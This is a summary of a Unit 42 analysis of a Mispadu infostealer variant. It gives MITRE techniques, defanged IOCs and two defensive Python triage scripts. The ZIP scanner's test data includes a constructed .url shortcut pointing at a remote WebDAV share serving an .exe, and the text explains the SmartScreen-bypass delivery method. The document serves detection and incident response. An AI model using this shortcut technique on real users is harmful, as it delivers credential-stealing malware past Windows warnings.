Exploring the Latest Mispadu Stealer Variant

Unit 42 identified a new Mispadu Stealer variant that uses crafted .url files and WebDAV (via rundll32) to bypass Windows SmartScreen and fetch malicious executables from a threat-actor-controlled network share. The sample performs timezone-based geofencing, extracts browser history with SQLite to match targeted financial and crypto-related domains, and exfiltrates the collected data via HTTP/S to C2 servers. #Mispadu #CVE-2023-36025

Keypoints

  • Researchers discovered a new Mispadu Stealer variant delivered via ZIP archives containing crafted .url files that point to network shares, allowing SmartScreen warnings to be bypassed.
  • The crafted .url uses a UNC path with an HTTP port (e.g., @80) to force WebDAV retrieval; execution is invoked through rundll32.exe to download and run the remote .exe.
  • The binary performs a timezone (UTC bias) check to geofence victims (targets primarily in Mexico/LATAM) and exits if outside targeted regions.
  • Mispadu copies Chrome/Edge history to %TEMP%, runs SQLite queries to extract recent URLs, and hashes split domain components (with a prepended fixed hash) to compare against 15 targeted hash groups.
  • If URLs match, the malware uploads data via HTTP/S POST to C2 (parameters include v1 language, v2 keyboard, v4 OS, v5 privileges, v6 architecture) and performs follow-up GET checks.
  • The sample uses AES via bcrypt.dll for string decryption and chooses HTTP for Windows 7/older or HTTPS for newer Windows versions during check-ins.
  • Known IOCs include domains (trilivok[.]com, plinqok[.]com), the IP 24.199.98[.]128, and multiple SHA256 file hashes including 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – Delivery via crafted .url files that cause users to execute remote binaries without SmartScreen warnings (‘the crafted .url file contains a link to a threat actor’s network share with a malicious binary… Windows will not display SmartScreen’s warning message.’)
  • [T1218] Signed Binary Proxy Execution – Use of rundll32.exe to invoke the WebDAV client and retrieve/execute remote payloads (‘the operating system will initiate a request through the rundll32.exe utility’)
  • [T1105] Ingress Tool Transfer – Retrieving malicious executables from a remote network share/WebDAV server (e.g., ‘the victim is redirected to the threat actor’s network share to retrieve and execute the malicious payload.’)
  • [T1124] System Time Discovery – Querying local time zone bias to implement geofencing and exit on non-targeted locales (‘queries the bias (or difference in minutes) between the local time zone and UTC… If the result is greater than 180, the malware will immediately exit.’)
  • [T1555.003] Credentials from Web Browsers – Accessing and querying local browser SQLite databases to extract URLs and potentially credentials (‘interact with the victim’s Microsoft Edge or Google Chrome browser history via SQLite. It copies these browser history databases to the %TEMP% directory, and it executes the following query…’)
  • [T1027] Obfuscated Files or Information – Use of AES encryption (via bcrypt.dll) to store/obfuscate strings and hinder analysis (‘selectively decrypts various strings… uses the AES encryption algorithm… through the bcrypt.dll library’)
  • [T1041] Exfiltration Over C2 Channel – Uploading collected data to C2 using HTTP/S POST requests with enumerated URI parameters (‘the malware proceeds to upload data via an HTTP/S POST request’)

Indicators of Compromise

  • [File Hash] sample malware SHA256 – 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea, bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789 (and 5 more hashes)
  • [Domain] C2 and distribution – trilivok[.]com, plinqok[.]com
  • [URL] C2 endpoints – hxxp://trilivok[.]com/4g3031ar0/cb6y1dh/it.php, hxxps://plinqok[.]com/3dzy14ebg/buhumo0/it.php
  • [IP / Path] direct payload hosts – 24.199.98[.]128/expediente38/…/8594605066.exe, 24.199.98[.]128/verificacion58/…/3072491614.exe
  • [Filename] payload example – 2456719228.exe (observed executed via crafted .url)

Unit 42’s technical procedure overview (concise):

The attack begins with a ZIP delivered to the victim (commonly via email or a malicious download) containing a crafted .url file. That .url encodes a UNC path pointing to a threat-actor-controlled network share and often includes an HTTP port (e.g., @80) so that Windows invokes the WebDAV client instead of SMB; Windows then uses rundll32.exe to request and execute the remote executable, bypassing SmartScreen warnings.
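The delivery pattern above can be triaged statically: unpack the archive, read the `URL=` value of each Internet Shortcut, and flag targets that point at a remote share, especially with the `@<port>` suffix that forces WebDAV. The following script is an added example for this summary, not Unit 42's code; the ZIP, the .url contents and the documentation address 203.0.113.10 are constructed, and the heuristic "remote host plus a WebDAV port or an executable target" is an assumed triage rule rather than one taken from the report.

```python
"""Flag Internet Shortcut (.url) entries in a ZIP whose target is a remote
UNC/WebDAV share. Added example; sample data is constructed."""
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Matches \\host[@port]\share\file, //host/share/file and file://host/share/file;
# the host group stops at the first path separator.
UNC_RE = re.compile(r"^(?:\\\\|//|file:/{2,})(?P<host>[^\\/]+)(?P<rest>[\\/].*)?$", re.IGNORECASE)

# Extensions that execute when opened from a share (assumed list).
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta", ".msi", ".lnk")


@dataclass
class UrlFinding:
    name: str                    # entry name inside the archive
    target: str                  # raw URL= value
    host: str                    # host part without any @port/@SSL suffix
    webdav_port: Optional[str]   # digits after '@' in the host, e.g. "80"
    remote: bool                 # host is not a local drive letter or loopback
    executable: bool             # target path ends in an executable extension


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None


def analyse_target(name: str, target: str) -> UrlFinding:
    """Classify a shortcut target; plain http:// and https:// targets are not UNC and are not flagged."""
    m = UNC_RE.match(target)
    if not m:
        return UrlFinding(name, target, "", None, False, False)
    bare_host, *suffixes = m.group("host").split("@")   # "host@80@SSL" -> "host", ["80", "SSL"]
    port = next((s for s in suffixes if s.isdigit()), None)
    rest = m.group("rest") or ""
    local = bare_host.lower() in ("localhost", "127.0.0.1") or re.fullmatch(r"[a-z]:", bare_host, re.I) is not None
    return UrlFinding(name, target, bare_host, port, not local, rest.lower().endswith(EXEC_EXT))


def is_suspicious(f: UrlFinding) -> bool:
    """Remote share plus a forced-WebDAV port or an executable target: the pattern described above."""
    return f.remote and (f.webdav_port is not None or f.executable)


def scan_zip(data: bytes) -> List[UrlFinding]:
    """Inspect every .url entry of a ZIP archive given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            target = parse_internet_shortcut(zf.read(info).decode("utf-8", errors="replace"))
            if target is not None:
                findings.append(analyse_target(info.filename, target))
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive: one WebDAV-style shortcut, one benign https shortcut, one non-shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.url",
                    "[InternetShortcut]\r\nURL=\\\\203.0.113.10@80\\share\\1234567890.exe\r\nIconIndex=1\r\n")
        zf.writestr("readme.url", "[InternetShortcut]\r\nURL=https://example.com/\r\n")
        zf.writestr("notes.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(("SUSPICIOUS " if is_suspicious(f) else "ok         ") + f"{f.name} -> {f.target}")
```

The same classifier can be pointed at attachments pulled from a mail gateway or at `.url` files written to a user's Downloads folder; the value of keying on the `@port` form is that a legitimate intranet shortcut to `\\fileserver\docs\report.docx` is left alone while a share reached over WebDAV that hands out an executable is surfaced for review.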

Once executed, the Mispadu binary performs a system time (UTC bias) check to geofence targets and exits if it is outside the intended regions. It decrypts internal strings using AES via bcrypt.dll, identifies %TEMP% for staging, and checks the Windows version to choose HTTP (Windows 7/older) or HTTPS (newer) for C2 check-ins. The malware copies the Chrome/Edge SQLite history files to %TEMP%, runs a SELECT query for URLs visited after Aug 29, 2023, splits each domain string on dots, prepends a fixed SHA256 constant, hashes the parts, and compares the results against 15 precomputed hash groups of targeted domains (financial and crypto services). If matches are found, it exfiltrates data via an HTTP/S POST to the C2 (including the parameters v1, v2, v4, v5 and v6), then performs a final GET check-in.
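The staging step leaves a concrete artifact: a copy of a Chromium History database sitting in %TEMP% rather than in a browser profile. The script below, an added example for this summary and not Unit 42's code, shows how a responder can sweep a directory for such copies and list the visits that fall after the report's 2023-08-29 cutoff. The staging directory and the History database in it are constructed here; Chromium's `last_visit_time` is stored as microseconds since 1601-01-01 UTC (WebKit time), which the converters handle.

```python
"""Find Chromium History copies staged outside a browser profile and list
visits after a cutoff date. Added example; sample data is constructed."""
import datetime as dt
import os
import sqlite3
import tempfile
from pathlib import Path
from typing import List, Tuple

WEBKIT_EPOCH = dt.datetime(1601, 1, 1, tzinfo=dt.timezone.utc)
SQLITE_MAGIC = b"SQLite format 3\x00"
CUTOFF = dt.datetime(2023, 8, 29, tzinfo=dt.timezone.utc)   # date quoted in the report


def to_webkit_time(when: dt.datetime) -> int:
    """Microseconds since 1601-01-01 UTC, computed without float rounding."""
    delta = when - WEBKIT_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 1_000_000 + delta.microseconds


def from_webkit_time(us: int) -> dt.datetime:
    return WEBKIT_EPOCH + dt.timedelta(microseconds=us)


def _open_readonly(path: str) -> sqlite3.Connection:
    return sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)


def looks_like_chromium_history(path: str) -> bool:
    """SQLite header plus a 'urls' table carrying url and last_visit_time columns."""
    with open(path, "rb") as fh:
        if fh.read(16) != SQLITE_MAGIC:
            return False
    con = _open_readonly(path)
    try:
        cols = {row[1] for row in con.execute("PRAGMA table_info(urls)")}
    finally:
        con.close()
    return {"url", "last_visit_time"} <= cols


def find_staged_history(directory: str) -> List[str]:
    """Every file under directory that parses as a Chromium History database."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                if looks_like_chromium_history(path):
                    hits.append(path)
            except (OSError, sqlite3.DatabaseError):
                continue
    return sorted(hits)


def recent_urls(path: str, since: dt.datetime) -> List[Tuple[str, dt.datetime]]:
    """URLs whose last visit is after `since`, oldest first."""
    con = _open_readonly(path)
    try:
        rows = con.execute(
            "SELECT url, last_visit_time FROM urls WHERE last_visit_time > ? ORDER BY last_visit_time",
            (to_webkit_time(since),),
        ).fetchall()
    finally:
        con.close()
    return [(url, from_webkit_time(ts)) for url, ts in rows]


def build_sample_staging_dir() -> str:
    """Constructed %TEMP%-like directory: one History copy plus one decoy text file."""
    directory = tempfile.mkdtemp(prefix="history-triage-")
    con = sqlite3.connect(os.path.join(directory, "History"))
    con.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
                "visit_count INTEGER, last_visit_time INTEGER)")
    visits = [  # constructed entries; hostnames are placeholders
        ("https://example.net/old", dt.datetime(2023, 8, 1, tzinfo=dt.timezone.utc)),
        ("https://bank.example/login", dt.datetime(2023, 9, 15, tzinfo=dt.timezone.utc)),
        ("https://exchange.example/wallet", dt.datetime(2024, 1, 10, tzinfo=dt.timezone.utc)),
    ]
    con.executemany("INSERT INTO urls (url, title, visit_count, last_visit_time) VALUES (?, '', 1, ?)",
                    [(u, to_webkit_time(t)) for u, t in visits])
    con.commit()
    con.close()
    with open(os.path.join(directory, "notes.txt"), "w") as fh:
        fh.write("decoy")
    return directory


if __name__ == "__main__":
    for db in find_staged_history(build_sample_staging_dir()):
        print(db)
        for url, when in recent_urls(db, CUTOFF):
            print("  ", when.isoformat(), url)
```

On a live host the sweep would be pointed at the user's %TEMP% (and the system temp directory); a History database found there, outside any `User Data\Default` profile path, is worth correlating with the process that created it, since the browser itself has no reason to write one to that location.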

Read more: https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/